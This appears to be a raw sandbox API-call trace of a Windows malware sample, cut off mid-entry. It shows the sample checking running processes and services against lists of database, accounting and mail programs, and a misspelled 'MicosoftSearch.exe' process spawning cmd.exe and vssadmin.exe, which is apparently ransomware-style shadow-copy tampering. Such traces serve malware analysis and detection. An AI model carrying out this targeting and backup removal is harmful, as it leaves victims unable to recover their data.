1 [0246.624] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.624] lstrlenW (lpString="svchost.exe") returned 11 [0246.624] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0246.624] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0246.624] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0246.624] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0246.624] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0246.624] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0246.624] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0246.624] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.625] lstrlenW (lpString="svchost.exe") returned 11 [0246.625] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0246.625] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.625] lstrlenW (lpString="svchost.exe") returned 11 [0246.625] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0246.625] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0246.625] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.626] lstrlenW (lpString="svchost.exe") returned 11 [0246.626] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0246.626] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0246.626] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0246.626] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0246.626] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0246.626] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0246.626] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0246.626] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.626] lstrlenW (lpString="svchost.exe") returned 11 [0246.626] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0246.626] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0246.626] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0246.626] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0246.626] lstrlenW (lpString="audiodg.exe") returned 11 [0246.627] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.627] lstrlenW (lpString="svchost.exe") returned 11 [0246.627] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.627] lstrlenW (lpString="svchost.exe") returned 11 [0246.627] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0246.627] lstrlenW (lpString="userinit.exe") returned 12 [0246.627] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0246.628] lstrlenW (lpString="dwm.exe") returned 7 [0246.628] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.628] lstrlenW (lpString="explorer.exe") returned 12 [0246.628] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0246.628] lstrlenW (lpString="spoolsv.exe") returned 11 [0246.628] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0246.628] lstrlenW (lpString="taskhost.exe") returned 12 [0246.628] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.629] lstrlenW (lpString="svchost.exe") returned 11 [0246.629] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0246.629] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0246.629] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0246.629] lstrlenW (lpString="reader_sl.exe") returned 13 [0246.629] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0246.629] lstrlenW (lpString="cmd.exe") returned 7 [0246.629] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0246.630] lstrlenW (lpString="conhost.exe") returned 11 [0246.630] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0246.630] lstrlenW (lpString="dllhost.exe") returned 11 [0246.630] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0246.630] lstrlenW (lpString="vssadmin.exe") returned 12 [0246.630] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0246.631] CloseHandle (hObject=0x2e8) returned 1 [0246.631] Sleep (dwMilliseconds=0x1f4) [0247.129] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea0b0 [0247.132] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0247.132] GetLastError () returned 0xea [0247.132] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc9a) returned 0x3dee5b0 [0247.132] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dee5b0, cbBufSize=0xc9a, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dee5b0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0247.133] CloseServiceHandle (hSCObject=0x47ea0b0) returned 1 [0247.133] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0247.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0247.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0247.133] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0247.133] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0247.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0247.133] lstrlenW (lpString="AudioSrv") returned 8 [0247.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0247.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0247.133] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0247.133] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0247.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0247.133] lstrlenW (lpString="BFE") returned 3 [0247.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0247.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0247.133] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0247.133] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0247.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0247.133] lstrlenW (lpString="CryptSvc") returned 8 [0247.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0247.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0247.134] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0247.134] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0247.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0247.134] lstrlenW (lpString="CscService") returned 10 [0247.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0247.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0247.134] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0247.134] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0247.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0247.134] lstrlenW (lpString="DcomLaunch") returned 10 [0247.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0247.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0247.134] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0247.134] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0247.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0247.134] lstrlenW (lpString="Dhcp") returned 4 [0247.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0247.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0247.135] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0247.135] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0247.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0247.135] lstrlenW (lpString="Dnscache") returned 8 [0247.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0247.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0247.135] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0247.135] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0247.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0247.135] lstrlenW (lpString="DPS") returned 3 [0247.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0247.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0247.135] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0247.135] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0247.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0247.135] lstrlenW (lpString="eventlog") returned 8 [0247.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0247.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0247.135] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0247.135] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0247.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0247.135] lstrlenW (lpString="EventSystem") returned 11 [0247.135] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0247.135] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0247.135] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0247.135] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0247.135] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0247.136] lstrlenW (lpString="gpsvc") returned 5 [0247.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0247.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0247.136] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0247.136] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0247.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0247.136] lstrlenW (lpString="LanmanWorkstation") returned 17 [0247.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0247.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0247.136] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0247.136] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0247.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0247.136] lstrlenW (lpString="lmhosts") returned 7 [0247.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0247.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0247.136] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0247.136] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0247.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0247.136] lstrlenW (lpString="MMCSS") returned 5 [0247.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0247.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0247.136] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0247.136] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0247.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0247.136] lstrlenW (lpString="MpsSvc") returned 6 [0247.136] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0247.136] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0247.136] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0247.136] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0247.136] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0247.136] lstrlenW (lpString="NlaSvc") returned 6 [0247.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0247.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0247.137] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0247.137] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0247.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0247.137] lstrlenW (lpString="nsi") returned 3 [0247.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0247.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0247.137] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0247.137] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0247.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0247.137] lstrlenW (lpString="PcaSvc") returned 6 [0247.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0247.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0247.137] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0247.137] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0247.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0247.137] lstrlenW (lpString="PlugPlay") returned 8 [0247.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0247.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0247.137] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0247.138] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0247.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0247.138] lstrlenW (lpString="Power") returned 5 [0247.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0247.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0247.138] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0247.138] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0247.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0247.138] lstrlenW (lpString="ProfSvc") returned 7 [0247.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0247.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0247.138] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0247.138] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0247.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0247.138] lstrlenW (lpString="RpcEptMapper") returned 12 [0247.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0247.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0247.138] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0247.138] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0247.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0247.138] lstrlenW (lpString="RpcSs") returned 5 [0247.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0247.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0247.138] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0247.138] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0247.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0247.138] lstrlenW (lpString="SamSs") returned 5 [0247.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0247.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0247.139] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0247.139] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0247.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0247.139] lstrlenW (lpString="Schedule") returned 8 [0247.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0247.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0247.139] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0247.139] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0247.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0247.139] lstrlenW (lpString="SENS") returned 4 [0247.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0247.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0247.139] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0247.139] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0247.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0247.139] lstrlenW (lpString="ShellHWDetection") returned 16 [0247.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0247.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0247.139] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0247.139] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0247.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0247.140] lstrlenW (lpString="Spooler") returned 7 [0247.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0247.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0247.140] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0247.140] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0247.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0247.140] lstrlenW (lpString="Themes") returned 6 [0247.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0247.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0247.140] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0247.140] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0247.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0247.140] lstrlenW (lpString="UxSms") returned 5 [0247.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0247.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0247.140] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0247.140] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0247.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0247.140] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dee5b0 | out: hHeap=0xb00000) returned 1 [0247.140] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e8 [0247.142] Process32FirstW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, 